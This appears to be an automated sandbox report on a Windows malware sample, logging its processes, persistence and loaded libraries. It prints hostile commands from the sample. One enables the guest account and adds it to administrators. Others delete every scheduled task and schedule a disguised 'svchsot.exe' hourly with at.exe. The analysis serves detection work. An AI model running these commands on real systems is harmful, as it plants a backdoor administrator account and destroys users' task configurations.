          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeMutant created: \Sessions\1\BaseNamedObjects\AAAAAA9PT0vfT4rqenp70A/Pqpp6+vr58= BBBBBB9PT0vf4Fr7K0sr0A/Pqpp6+vr58= CCCCCC9PT0vQXpr7K0sr0A/Pqpp6+vr58= GGGGGG4wIF/vL7858= XXXXXX579E5A5B VVVVVVrr2unw==
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\JH.BAT""
          Source: ILQ18dgzMU.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: ILQ18dgzMU.exeReversingLabs: Detection: 94%
          Source: ILQ18dgzMU.exeString found in binary or memory: cmd.exe /c net user guest /active:yes && net user guest %s && net localgroup administrators guest /add
          Source: svchsot.exeString found in binary or memory: cmd.exe /c net user guest /active:yes && net user guest %s && net localgroup administrators guest /add
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeFile read: C:\Users\user\Desktop\ILQ18dgzMU.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\ILQ18dgzMU.exe "C:\Users\user\Desktop\ILQ18dgzMU.exe"
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\JH.BAT""
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /delete /tn * /f
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc config Schedule start= auto
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net start "Task Scheduler"
          Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 start "Task Scheduler"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 0:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 1:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 2:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 3:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 4:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 5:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 6:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 7:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 8:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 9:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 10:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 11:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 12:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 13:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 14:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 15:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 16:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 17:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 18:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 19:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 20:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 21:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 22:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 23:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 24:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: unknownProcess created: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe "C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe"
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\JH.BAT""Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /delete /tn * /fJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc config Schedule start= autoJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net start "Task Scheduler"Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 0:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 1:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 2:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 3:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 4:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 5:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 6:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 7:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 8:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 9:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 10:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 11:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 12:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 13:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 14:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 15:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 16:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 17:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 18:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 19:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 20:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 21:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 22:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 23:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 24:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 start "Task Scheduler"Jump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeSection loaded: msvcp60.dllJump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
          Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
          Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dll
          Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dll
          Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dll
          Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dll
          Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dll
          Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dll
          Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dll
          Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dll
          Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dll
          Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dll
          Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dll
          Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dll
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeSection loaded: apphelp.dll
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeSection loaded: wininet.dll
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeSection loaded: avicap32.dll
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeSection loaded: msvfw32.dll
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeSection loaded: winmm.dll
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeSection loaded: winmm.dll
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeSection loaded: urlmon.dll
